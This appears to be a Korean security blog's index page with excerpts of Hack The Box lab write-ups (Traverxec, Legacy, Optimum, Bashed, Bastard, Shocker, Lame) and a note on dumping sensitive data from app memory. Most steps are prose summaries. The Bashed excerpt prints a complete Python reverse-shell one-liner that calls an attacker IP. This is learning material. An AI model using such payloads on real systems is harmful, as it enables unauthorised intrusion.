분류 전체보기 (48) 썸네일형 리스트형 Traverxec 1. Enumeration 80번 포트에서 nostromo 1.9.6 버전 사용 확인 2. Exploitation nostromo 1.9.6 익스플로잇 검색 및 다운로드 해당 익스플로잇 페이로드 확인 다운로드 받은 익스플로잇은 python2에서 실행되므로 python2.7 가상환경을 생성 공격자 서버에서 리버스 쉘을 받음 3. Privilege Escalation nhttpd.conf 파일에 디렉터리에 대한 정보가 포함된 구성 파일이 존재 디렉토리에서 ssh 파일 발견 넷캣으로 ssh 파일 다운로드 다운받은 파일 압축해제 키에 대한 패스워드가 필요한 것을 확인 존 더 리퍼 툴을 사용해 (?) 찾은 패스워드로 ssh를 통해 david 계정으로 접근 server-stats.sh 바이너리 발견 바이너리 내용 .. Legacy 1. Enumeration 445번 포트 smb OS는 Windows XP임을 확인 smb와 관련된 모든 취약점들에 대한 정보수집 구글링으로 익스플로잇 코드 서치 해당 익스플로잇 설치 msfvenom 툴을 이용해서 호스트로 리버스쉘을 보내는 쉘코드 제작 msfvenom 실행해서 쉘코드 받음 전달받은 쉘코드로 수정 입력해야하는 옵션 확인 쉘코드가 정상적으로 실행되고 리버스쉘을 받은 것을 확인 윈도우XP이기 때문에 파워쉘이 설치되어 있지 않고, whoami 명령어도 사용 불가 직접 루트 플래그 찾기 Optimum 1. Enumeration 홈페이지 접근 2. Exploitation HFS 2.3 익스플로잇 검색 사용할 익스플로잇 경로 확인 후 복사 해당 익스플로잇에서 페이로드와 url 확인 임의의 문자열로 검색했을 때 URL이 검색기능에서 다음과 같이 URL 인코딩된 페이로드가 들어가는 것을 확인 익스플로잇에 작성된 페이로드를 참고하여 임의의 페이로드를 URL 인코딩해서 작성 cmd로 공격자 IP로 ping 전송 icmp 트래픽을 받음 공격대상에서 공격자 아이피로 ICMP echo request를 보냈고 공격자가 공격대상에게 ICMP echo reply를 보냄 이를 통해 Blind Remote Command Execution이 이루어져 있어서 결과가 출력되지 않지만 RCE는 이루어지고 있음을 알 수 있다 nish.. Bashed 1. Enumeration홈페이지 접근gobuster로 디렉토리 파악2. Exploitation웹쉘 발견파이썬 존재 확인python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 페이로드 입력리버스 쉘 회득3. Privilege Escalationlinenum 코드 복사 bashed 디렉토리에서 웹서버를 열고 wget으로 linenum 파일 다운로드linEnum 실행권한 추가 후 실행, linEnum으로.. Bastard 1. Enumeration 홈페이지 접근 change.txt 파일에서 druapl 버전 정보 확인 2. Exploitation drupal exploit 검색 후 41564 익스플로잇 가져옴(다른 RCE 익스플로잇으로도 가능) 41564.php 파일 다운로드 후 코드 확인 시 파라미터에 앤드포인트 경로가 필요한 것을 확인 dirsearch로 endpoint 발견 앤드포인트 확인 php 코드 수정(endpoint url은 퍼징을 통해 발견) php코드 실행 시스템 명령어 동작 확인 smbserver 오픈 명령어 전송 유저권한 획득 3. Privilege Escalation 중요정보 출력 OS는 Windows 2008 OS Version : 서비스팩이 없기 때문에 결과값이 N/A로 출력 Hotfix(s) :.. Shocker 대상 확인 스캐닝 80번 포트가 열려 있는 것을 확인했으므로 웹사이트로 접근 gobuster 툴로 해당 사이트의 숨겨진 경로 확인 후 발견한 경로에서 추가적으로 검색 방법 1. BurpSuite로 풀이 user.sh 파일 다운로드 및 파일 내용 확인 리스너를 기동한 후 리버스쉘 명령어 입력 sudo -l 명령어를 통해 현재 사용자에 대한 sudo 권한 확인 sudo 권한으로 perl을 실행할 수 있는 것을 확인 perl 리버스쉘 실행 시 루트 권한 및 플래그 획득 확인 방법 2. MSF로 풀이 shellshock 페이로드 검색 사용할 페이로드에 입력해야할 옵션 확인 옵션값 입력 후 익스플로잇하면 쉘 획득 sudo -l 명령어를 통해 현재 사용자에 대한 sudo 권한 확인 sudo 권한으로 perl을 실행.. Lame 대상 확인 스캐닝 searchsploit으로 Samba 페이로드 찾기 show options 명령어로 입력해야할 옵션 확인 호스트 지정 후 익스플로잇하면 루트 권한 및 플래그 획득 15. Sensitive Information in Memory 1. Sensitive Information in Memory 개요 - 메모리에 존재하는 중요한 데이터를 덤프하여 확인 - 일부 애플리케이션은 필요하지 않더라도 중요한 정보를 애플리케이션 메모리에 저장 개발자가 중요한 정보를 포함할 수 있는 속성 또는 인스턴스 변수를 사용 후 제거하지 않아 발생 2. 실습 아이디는 tester, 패스워드는 test12345로 로그인 시도 Fridump 실행 프리다덤프의 옵션 -u : usb에 연결된 디바이스를 지정 -r : 메모리의 읽기 전용 부분을 덤프 -s : 입력한 문자열만 뽑아서 따로 저장 dump 폴더에 있는 string 파일에 입력한 아이디, 패스워드 발견 3. 대응방안 - 종단간 암호화(End-to-End) 적용 가상 키패드 사용(키보드 보안 모듈) - 메모.. 이전 1 2 3 4 ··· 6 다음